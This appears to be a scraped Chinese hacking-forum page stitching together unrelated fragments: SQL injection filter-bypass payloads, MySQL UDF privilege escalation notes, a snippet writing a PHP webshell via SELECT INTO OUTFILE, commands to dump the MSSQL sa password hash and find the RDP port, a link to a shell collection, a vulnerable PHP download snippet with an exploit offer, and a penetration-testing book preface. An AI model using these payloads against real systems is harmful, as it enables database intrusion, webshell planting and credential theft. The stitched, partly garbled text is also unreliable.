下载

例如or 1=1即
%6f%72%20%31%3d%31

而Test也可以为

CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

2、通过空格绕过
如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如
or” swords” =‘swords”，由于mssql的松散性，我们可以把or ”swords” 之间的空格去掉，并不影响运行。

3、运用字符串判断代替
用经典的or 1=1判断绕过,
如

or ”swords” =”swords”

这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过
可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，
如

or ”swords” = N” swords”

，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过
效果值得考证，但毕竟是一种方法。如

or ”swords” =‘sw” +” ords” ；EXEC(‘IN” +” SERT INTO ”+” …..” )

6、通过LIKE绕过
以前怎么就没想到呢？
如

or”swords” LIKE ”sw”

显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过
与上面的LIKE的思路差不多,
如

or ”swords” IN (”swords”)

8、通过BETWEEN绕过
如

or ”swords” BETWEEN ”rw” AND ”tw”

9、通过>或者<绕过

or ''swords'' > ”sw”
or ”swords” < ”tw”
or 1<3
……

10、运用注释语句绕过
用/**/代替空格，如：UNION /**/ Select /**/user，pwd，from tbluser
用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来

0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

create table hack(test image);
insert into hack (cmd) values ('┼硥捥瑵?敲畱獥?瘢污敵?┩>u');
Select cmd into [a] in 'h:\wwwroot\hack41.cn\wwwroot\bbs\database\x.asp;a.xls' 'excel 8.0;' from hack

先排除几种可能.

1、被服务器端的杀软KILL。

2、没写入文件。

3、由于脚本生成在system32目录下的文件名随机，导致程序没找到文件名。

1、我在本地进行测试，关闭了杀软，所以这种情况不存在，排除。

2、打开system32目录，生成出来的程序安安静静的躺在目录下。图2

1、做出第三种假设已经是排除前两种可能的情况下，既然怕程序是问题，那我们手动创建吧。（mysql5.0以上就不支持带绝对路径，所以生成在system32下）如图3

如图：4

去google了一番，网上还是没有最终的答案，只找到一个比较好的文章，那就是ninty写的那篇创建函数问题。可是琢磨一会还是没看懂。最后，看到无名在线，他常年在php环境下，对mysql比较了解。

跟他讨论以后，他给出问题的解决方法是把udf放在mysql中的data目录下。如图：5

他在他的机器上可以成功，我这就是通过不了。最后，用QQ协助，让他操作我的电脑，最后还是得不到解答，只能与好神奇来结束。

无奈下，到BK群求助，ninty说是路径问题，后来加了Q，远程以后，才得以解决。最后，总算明白他那篇文章，哈哈，这里不要怪我哈，我把资料做个整理。

提权之前，确定mysql权限，要是4.0版本直接用路径；要是5.0版本，放在system32目录下还不行，就放在data，要是在5.1版本下，操作会比较麻烦。

用

show variables like '%plugin%';

只要把文件放在这个path下，就可以执行成功！但前提，你必须有mysql目录下目录创建权限。

ftp命令的妙用

ftp
open www.baidu.com 60000

终端超出限制

mstsc /console /admin /v:sebug.cn:3389

内网渗透的小命令

for /f %%i in (serv.txt) do ping %%i -n 1 | find "Pinging" >> res.txt

嗅探防掉线

echo off
:3
ping www.XXXX.com
if errorlevel 1 goto 1
if errorlevel 0 goto 0
:0
goto 3:
:1
logoff

mysql导出shell

Drop TABLE IF EXISTS temp; //如果存在temp就删掉
　　Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段
　　Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表
　　Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
　　Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)

各种shell
http://201.151.62.115:8080/shells/

MS SQLSERVER SA密码

select name,password from master.dbo.sysxlogins where name='sa'

Mysql密码

select file_priv from mysql.user where user='root';

cmd得终端端口

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

$url=base64_decode($url);
$fileurl=str_replace($webdb[www_url],"",$url);
if( eregi(".php$",$fileurl) && is_file(PHP168_PATH."$fileurl") ){
die("ERR");
}

if(!$webdb[DownLoad_readfile]){
$fileurl=strstr($url,"://")?$url:tempdir($fileurl);
header("location:$fileurl");
exit;
}

不玩了，找不到官方后台密码。无语死了。
最近考试，没得玩。。。简单写个exp，大家要的找我取。

或者去吐司下：http://www.t00ls.net/viewthread.php?tid=8890&pid=114395&page=3&extra=#pid114395

多了爆路径的：

最近从官方找到的资料：

冰sugar：希望给大家多多支持，也希望朋友多多宣传！

简介：

本书是一本windows平台下渗透技术的入门书籍，作为一本计算机爱好者深入浅出的书籍，门槛低，所以称之为入门书籍。现在，作为渗透攻防入门书籍并不是很多，即便有了，书上内容所使用的工具也有所过时，本书牵涉到的漏洞以及工具实用性非常强。

为了给予读者朋友更好的知识盛宴，笔者尝试着囊括近几年来最流行的攻击手法。但是技术永远是进步的，很多东西还是需要读者自己去挖掘，但这本书足以概括了攻击层次的大体知识，也不乏很多新鲜技巧。读者朋友们无需掌握许多乏味的基础知识以及基本概念即可掌握该书的绝大部分内容，笔者会从实战的角度来对枯燥的理论知识释疑，引领大家走完这本书的征程。

●涉及内容：
网络基础知识、信息收集、缓冲区溢出知识、拒绝服务、数据库攻防、 Web漏洞发掘、内网渗透、后门技术等

●适合读者：
1、对渗透攻防技术感兴趣的朋友
2、网络爱好者
3、网管人员
4、想拓展安全知识的技术相关人员

●序：

静谧夜空，星满苍穹，广袤大地被月光擦拭得那样清澈，散发着童话般的馨香。如此美的夜，充满着浪漫和陶醉，可在黑客技术旅者的眼中，却是那样朴素而平常。

萤火 学海无涯苦坐舟

草长莺飞的旷野，他们像是坠落草原的星辰，简约沉默，却在寒夜中闪烁着坚强的光。是萤火虫，抑或是我？同样的苦旅，相似的激情，狂热地燃烧自己的生命，点滴耗尽，为成就理想和真实之约而顽强殉道，断不言悔。

萤火虫，就是黑客的憧憬与痴愿之灵。

精灵 玉楼明月长相忆

用盛开的清秀染绿古道清泉，让似火的霓裳绽放山涧寂静。有时，会化作一抹嫣然的绿，为寒冬打开温暖的希望，抑或，曾经是一方淡雅红叶，飘进晚秋的深邃。激情时，似盛夏清风，拥柔裹香飞抵万里云天。忧伤处，是婉约古城，秀美惟存，却从此冷漠沉寂。

正因是如此幻美，黑客技术才若精灵般散发着致命的诱惑，为身后万千萤火苦苦追求。

书卷 千呼万唤始出来

万千承载，凝结一部书卷。也许它不是开启精灵少女心扉的钥匙，或许也不能令技术古城之旅温馨坦途，甚或，会让你从此就在兰菊落英中怅然悟道。然而，它在萤火虫瞬息的生命里，却为通向对技术执着的痴爱时空架起了一座伟岸的浮桥。

萤火书卷——技术与狂热的基线，让我们的精灵爱旅，从这里开始。

此致

苦夜共勉

[E.S.T]冰血封情

庚寅年正月三十黄昏题于洛辰小筑亦岚轩